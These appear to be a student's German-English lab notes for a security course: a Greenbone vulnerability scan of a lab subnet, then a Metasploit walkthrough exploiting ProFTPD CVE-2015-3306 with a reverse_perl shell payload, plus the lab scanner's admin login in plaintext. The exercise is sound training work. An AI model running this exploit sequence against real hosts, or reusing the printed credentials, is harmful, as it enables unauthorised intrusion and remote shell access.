Der Vulnerability Manager findet Schwachstellen in Netzwerken und bewertet Sie nach (Farb)-Kategorien. Der GVM wird über ein Webinterface gesteuert. 
Le gestionnaire de vulnérabilité trouve les points faibles des réseaux et les classe en fonction de catégories (de couleur). Le GVM est contrôlé via une interface Web.

P1 - Greenbone Vunerability Manager (GVM)

Aufruf:

https://gvm.itsecnet.de/
username: gvmadmin
password: !!gvmadmin!

Vorgehen:

Sie sollen die Rechner im externen Netz auf mögliche Schwachstellen
untersuchen.

1) Richten Sie ein neues Target ein. 

◦ Target finden Sie unter „Configuration“ im Hauptmenu
◦ Mit * wird ein neues Target angelegt.
◦ Notwendig ist die Eintragung der Ziel-IP unter Manual Hosts. (192.168.66.0/24)

PS:
   - The Internet Assigned Numbers Authority (IANA) is responsible for maintaining the official
     assignments of port numbers for specific uses.

2) Richten Sie einen neuen Task ein.

◦ Target finden Sie unter „Configuration“ im Hauptmenu
◦ Mit * wird ein neues Target angelegt.
◦ Notwendig ist die Eintragung der Ziel-IP unter Manual Hosts.

3) Starten Sie den Task

◦ Man kann eine Task auch während des Scanvorgangs beobachten. Klicken Sie dazu das
  "requested" Symbol in der Taskübersicht an.
◦ Die längste Zeit des Scanvorgangs ist bei einer Anzeige von 98% oder 99%.

4) Analysieren Sie den Scan-Report.

--> Ja, Schwachstellen wurde entdeckt

--> Schwachstellen:
    - UnrealIRCd Authentication Spoofing Vulnerability : UnrealIRCd is an Open Source IRC Server.
      This host is installed with UnrealIRCd   and is prone to authentication spoofing
      vulnerability.
      
    - FTP Unencrypted Cleartext Login: (File Transfer Protokol) ; The remote host is running a
      FTP service that allows cleartext logins over unencrypted connections.
    
    - SSH Weak Encryption Algorithms Supported : The remote SSH server is configured to allow
      weak encryption algorithms.
    
--> Die Zuverlässigkeit jeder Schwachstelle hängt von QoD und Schweregrad ab.
    je höher die QoD, desto zuverlässiger die Schwachstelle.
    
 The QoD of a “Detection” result is higher than that of an actual “Vulnerability” Result as it reflects the quality of the product detection itself – which is reliable – and not the quality of the related vulnerability tests which may be unreliable for various reasons.

The Quality of Detection (QoD) is a value between 0% and 100% describing the reliability of the executed vulnerability detection or product detection. This concept also solves the challenge of potential vulnerabilities. Such are always recorded and kept in the results database but are only visible on demand.

--> Auswirkungen : impact of the vulnerability
    - UnrealIRCd Authentication Spoofing Vulnerability : Die erfolgreiche Ausnutzung dieser 
      Schwachstelle ermöglicht es Angreifern aus der Ferne, Zertifikatsfingerabdrücke zu 
      fälschen 
      und sich so als anderer Benutzer anzumelden.
--> Gegenmaßnahmen: Solution against ein Attack
    - UnrealIRCd Authentication Spoofing Vulnerability : Aktualisieren Sie auf UnrealIRCd 
      3.2.10.7 oder 4.0.6 oder höher.
      
-->  Elemente des Scan Reports in nmap:
     - der Host
     - der Port
     - der Betriebsystem / OS

-->  Wozu kann der Scan-Report verwendet werden und von wem?
     - All existing reports for all scans can be displayed by selecting Scans > Reports in the 
       menu bar.
     Der Scan-Report kann verwendet werden, um potenzielle Schwachstellen durch die 
     IT-Sicherheitsabteilung eines Unternehmens zu identifizieren und zu beheben.
 

P2 - METASPLOIT

1) --> Ein Exploit führt eine Folge von Befehlen aus, die auf eine bestimmte Schwachstelle in
       einem System oder einer Anwendung abzielen, um dem Angreifer Zugriff auf das System zu 
       gewähren.

- An exploit executes a sequence of commands that target a specific vulnerability found in a 
    system or application to provide the attacker with access to the system. Exploits include 
    buffer overflow, code injection, and web application exploits. Metasploit Pro offers 
    automated exploits and manual exploits.
    
    
    --> Eine Payload ist ein Codestück, das durch den Exploit ausgeführt werden soll. 
        Schauen Sie sich das Metasploit-Framework an. Es ist einfach eine Sammlung von Exploits 
        und Payloads.
        
     - A payload is a piece of code to be executed through said exploit. Have a look at 
       the Metasploit Framework. It is simply a collection of exploits and payloads.
       There are three different types of payload modules in the Metasploit Framework: 
       Singles, Stagers, and Stages.
       

2) 
--> I Pick a vulnerability and use an exploit

kommando: search "name of cve-vulnerabilities"   to pick the vulnerability

result:  search CVE-2015-3306

kommando: use "name of the exploit of the CVE"  to use the exploit of the vulnerability

result : use exploit/unix/ftp/proftpd_modcopy_exec

--> I set the Target Host mit der Kommando: set RHOSTS "ip of the target"
    
    result: set RHOSTS 192.168.66.104
    
    kommando: show options
    Optional(show options): I can also set my ip mit der kommando: set LHOSTS "my ip"

--> I set the payloads ( 'show payloads': will show the avalaible payloads of the exploits)
    kommando: set PAYLOAD "name of the chosen payload"
    
    result: set PAYLOAD cmd/unix/reverse_perl 
    
--> I set my own ip mit kommando : set LHOST "my ip"

    result : set LHOST 172.16.56.101             (AP1: 172.16.56.101)

--> then I run the Attack with : "run" or "exploit"



3)
--> 

--> Welche Shellkommandos dürfen Sie ausführen
   man kann datei erstellen(touch), löschen(rm) und umbenennen(mv).
   i can also list the file (ls)

--> Ich glaube , wir sind in user-kontext 

-->  - There is total information disclosure, resulting in all system files being revealed.

    - There is a total shutdown of the affected resource. The attacker can render 
      the resource completely unavailable.









